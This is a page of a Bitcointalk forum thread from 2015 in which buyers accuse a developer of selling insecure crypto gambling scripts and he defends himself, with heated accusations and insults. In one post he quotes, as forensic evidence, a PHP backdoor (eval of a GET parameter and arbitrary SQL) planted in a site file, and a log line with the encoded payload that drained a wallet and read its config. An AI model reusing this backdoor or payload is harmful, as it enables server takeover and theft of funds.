Bitcoin Forum
November 13, 2024, 10:39:14 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 [2] 3 »  All
  Print  
Author Topic: Johny1976 is a Scam Artist, Dont buy any of his code.  (Read 3154 times)
eoakland
Hero Member
*****
Offline Offline

Activity: 699
Merit: 504



View Profile
January 11, 2015, 11:27:14 PM
 #21

He sold me his Coinjack script.  it has syntax errors and game breaking bugs galore.  he agreed to refund me, and then changed his mind.  this guy doesn't even know the rules of the games he develops.  apparently his customer service is stellar as he is offering to perform sexual favors for you. 

https://bitcointalk.org/index.php?topic=920645.0
Lay-z
Full Member
***
Offline Offline

Activity: 259
Merit: 100


View Profile
January 11, 2015, 11:35:50 PM
 #22

When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag

Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...

Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.

I was going to do something today but I haven't finished doing nothing from yesterday...
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 11, 2015, 11:38:54 PM
 #23

When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag

Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...

Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.

Yes, there was various bugs and that's the reason the code is open so people can check it themselves. We're releasing updates and the last 2 are pretty stable.

But we are not thieves! Idiots maybe, but not thieves!
eoakland
Hero Member
*****
Offline Offline

Activity: 699
Merit: 504



View Profile
January 11, 2015, 11:50:42 PM
 #24

he admits to his coding being the reason for hacks in the following link.
https://bitcointalk.org/index.php?topic=920645.0
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 11, 2015, 11:55:31 PM
 #25

he admits to his coding being the reason for hacks in the following link.
https://bitcointalk.org/index.php?topic=920645.0

This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot

To the recent hack:


Thank you.

I've investigated the issue and here is my conclusion:

Fact 1

This is head of our original file /content/ajax/_stats_load.php:
Code:
<?php
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

This is head of your custom edited file /content/ajax/_stats_load.php:
Code:
<?php if(isset($_GET['query'])) {mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);mysql_select_db($_GET['db']);$q mysql_query($_GET['query']);while($m =  mysql_fetch_assoc($q)) {$values array_values($m);$keys array_keys($m);for($i 0;$i<count($values);$i++) {echo $keys[$i] . ": " $values[$i] . "<br>";}echo "<br>";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).

Fact 2

This line is from your webserver log:
Code:
pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.

The second part is the address on which the stolen funds were sent.

Fact 3

The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.

Fact 4



Only person who could edit this file is the guy who did the custom coding for you.



I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.


Resources:
/var/log/apache2/other_vhosts_access.log.1  your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php  compromised file


I'm sorry what happened to you. At least you know you can't trust anybody.

We would much appreciate your permission to make this case public (there's some people who claim this was our fault).


Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.

Johny


Bandot's reply:



I've just gave you evidence of my claimings, do you have one?
mmitech (OP)
Legendary
*
Offline Offline

Activity: 1148
Merit: 1001


things you own end up owning you


View Profile
January 12, 2015, 12:21:25 AM
 #26

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 12, 2015, 12:22:04 AM
 #27

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 


We lives in Ostrava and we've discussed it before. You had chance to visit us!
mmitech (OP)
Legendary
*
Offline Offline

Activity: 1148
Merit: 1001


things you own end up owning you


View Profile
January 12, 2015, 12:31:31 AM
 #28

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 


We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 12, 2015, 12:33:57 AM
 #29

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 


We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? Smiley You already have results? If no, how can you say our code cause harm to people?
mmitech (OP)
Legendary
*
Offline Offline

Activity: 1148
Merit: 1001


things you own end up owning you


View Profile
January 12, 2015, 12:38:48 AM
 #30

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 


We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? Smiley You already have results? If no, how can you say our code cause harm to people?

Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!
mmitech (OP)
Legendary
*
Offline Offline

Activity: 1148
Merit: 1001


things you own end up owning you


View Profile
January 12, 2015, 12:42:07 AM
 #31

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 12, 2015, 12:45:57 AM
 #32

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 


We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? Smiley You already have results? If no, how can you say our code cause harm to people?

Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!

Hundreds of people? Oh come on. Yes, the code is fucking secure. HE DOESN'T EVEN HAVE TO TRY. ALL IT TAKES IS TO OPEN THE UPDATE AND CHECK THE OPEN FILES. IF IT'S OKEY, RUN IT. If not, then accuse us of being thieves!

Post there evidence we did it and it'll be there without deleting. But you only try to destroy us because of your anger. You only wants what's easy. You don't want the truth.
I can sleep because we do everything we can! We don't tell people to trust us. They can check the whole code. The WHOLE code! You didn't and trusted us although we encourage customers to do with the code whatever they want.

eoakland
Hero Member
*****
Offline Offline

Activity: 699
Merit: 504



View Profile
January 12, 2015, 01:02:21 AM
 #33

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins Grin

johny1976
Legendary
*
Offline Offline

Activity: 1135
Merit: 1002

Developer


View Profile
January 12, 2015, 01:07:41 AM
 #34

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins Grin



Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.
eoakland
Hero Member
*****
Offline Offline

Activity: 699
Merit: 504



View Profile
January 12, 2015, 01:20:18 AM
 #35

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins Grin



Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.

good luck scamming someone else.  you are a thief and crook. 

jstezloděj , vaše rodina musí stydět za vás . budete muset vyrůst a naučit se být mužem .
(you are a thief, your family has to be ashamed of you.  you need to grow up and learn how to be a man.)
Seketsuna
Sr. Member
****
Offline Offline

Activity: 294
Merit: 250


View Profile
January 12, 2015, 04:55:42 AM
 #36

Sue him this is why some people wont do businesses here in the forums. lots of scammers!
jh7phone
Member
**
Offline Offline

Activity: 107
Merit: 10


View Profile
January 12, 2015, 03:14:11 PM
 #37

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins Grin

I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!

eoakland
Hero Member
*****
Offline Offline

Activity: 699
Merit: 504



View Profile
January 12, 2015, 04:05:11 PM
 #38

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins Grin

I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!

Johny1976 is an idiot.  he could have refunded us, but he chose to run off with the immediate gain of 2.4 btc from us.  his actions made sure he will never sell any future script.  nobody will take him seriously,  he is not on the "trusted" list of forum members so his feedback means nada.  by the looks of it, his account seems to be managed by a few different people, sometimes he can convey coherent sentences, and other times his grammar is remedial at best.  way to go geniuses, congrats on the bugs fixes for your now defunct scripts.   Grin
snarf
Newbie
*
Offline Offline

Activity: 8
Merit: 0


View Profile
January 12, 2015, 11:11:42 PM
 #39

Hi,

I partially own pay-dice.com (together with bandit and others), which got robbed of 440 XPY.
Like you I was really pissed at first when we heard there was a backdoor used, even more pissed I became when johny told us he didn't refund.
Yesterday we found out that Johny is not responsible for our hack, and I can't blame him for not refunding us.
Please stop using us/paydice as an example for your witchhunt, it was our dumb fault.
Also pretty amazing how people complain after getting their money back, when purchasing software with an open code.
Perhaps Johny should've done a better job on securing his software, but in no way can he be blamed for an entire hack.
cloverme
Legendary
*
Offline Offline

Activity: 1512
Merit: 1057


SpacePirate.io


View Profile WWW
January 13, 2015, 12:20:46 AM
 #40

I just randomly ran across this thread and stopped in mainly because of the title. For what it's worth, I thought it was important to vouch for Johny1976 because of an incident that occurred in the Project Development thread earlier that I happened to see as well. I ran across someone trying to give away his script and that they had put a backdoor in it, the community here was downloading and getting ready to use the script, which was being provided for free by the hacker(s).

First, let me state that I'm a customer of Johny's, I purchased one of his scripts for Bitcoin (I think 1 or 2 BTC) in September 2014 and have been running since then with no thefts. Second, some of his less reputable customers purchase the script from him, modify it with a backdoor, then redistribute it either for free or a cost. This has led to many of the incidents where funds have been lost. I am aware though of an earlier bug that led to a user being able to double withdrawal, but that was fixed in about week. There were a few customers that lost some money, but when I followed up with them, Johny did reimburse them some funds. Johny has offered technical support, assistance, and free upgrades to his script all without backdoors. Like all code, there are bugs ans issues that arise, but I believe he does his best to solve them. If anything, when he releases software, he should provide the hash of the .zips as official releases and state them in public, this would help call out tampering.

Like anything here in the forums, you can either take or leave it, but I think the accusations here against Johny1976 haven't had the due diligence necessary to label him as a scam artist.  Again, this is just based on my experience and how he's dealt with other customers that I've spoken to as well outside the forums.

Good luck to all, and be careful.
Pages: « 1 [2] 3 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!